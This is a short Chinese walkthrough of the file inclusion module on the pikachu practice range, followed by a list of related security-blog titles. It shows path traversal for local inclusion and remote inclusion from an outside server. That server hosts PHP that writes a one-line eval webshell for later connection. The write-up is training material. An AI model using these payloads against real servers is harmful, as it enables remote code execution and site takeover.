pikachu文件包含漏洞靶场通关攻略

本地文件包含

首先,在靶场根目录下创建一个php文件,内容是phpinfo();

其次,上传一个任意球星图片,会跳转到带有filename参数的php文件下

然后,将filename的参数改为可以访问到我们创建的php文件的地址

../../../../2.php

就可以访问到我们的phpinfo

远程文件包含

在进行远程文件包含时,要先修改两个参数

php.ini下的allow_url_include和allow_url_fopen两个参数改为On,前面的冒号也要删掉

(看自己是什么版本的PHP,要和版本对应)

进行任意图片提交

在云服务器上创建一个2.txt文件 内容是

复制代码
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>

就是创建一个shell.php 文件,文件内容为一句话木马

然后,将filename的参数改为我们2.txt的地址

http://47.121.191.208/2.txt

回车后就可以在fileinclude目录下找到我们上传的shell.php文件

接下来使用连接工具进行webshell连接,成功连接

相关推荐
时时三省1 小时前
【时时三省】vectorcast使用教程
安全·安全架构
galaxylove2 小时前
Gartner发布最新指南:企业要构建防御性强且敏捷的网络安全计划以平衡安全保障与业务运营
网络·安全·web安全
PeterJXL2 小时前
Chrome 下载文件时总是提示“已阻止不安全的下载”的解决方案
前端·chrome·安全
BenSmith6 小时前
CVE-2025-6554漏洞复现
安全
BenSmith6 小时前
CVE-2018-17463复现
安全
lsec6 小时前
内存加载带有TLS的DLL的问题分析
windows·安全
m0_694845578 小时前
服务器如何配置防火墙规则开放/关闭端口?
linux·服务器·安全·云计算
mooyuan天天10 小时前
DVWA靶场通关笔记-文件上传(Medium级别)
web安全·文件上传·文件上传漏洞·dvwa靶场·文件上传mime
柴郡猫^O^12 小时前
OSCP - Proving Grounds - DC - 1
安全·网络安全·安全性测试
泡泡以安12 小时前
JA3指纹在Web服务器或WAF中集成方案
服务器·安全·https·ja3指纹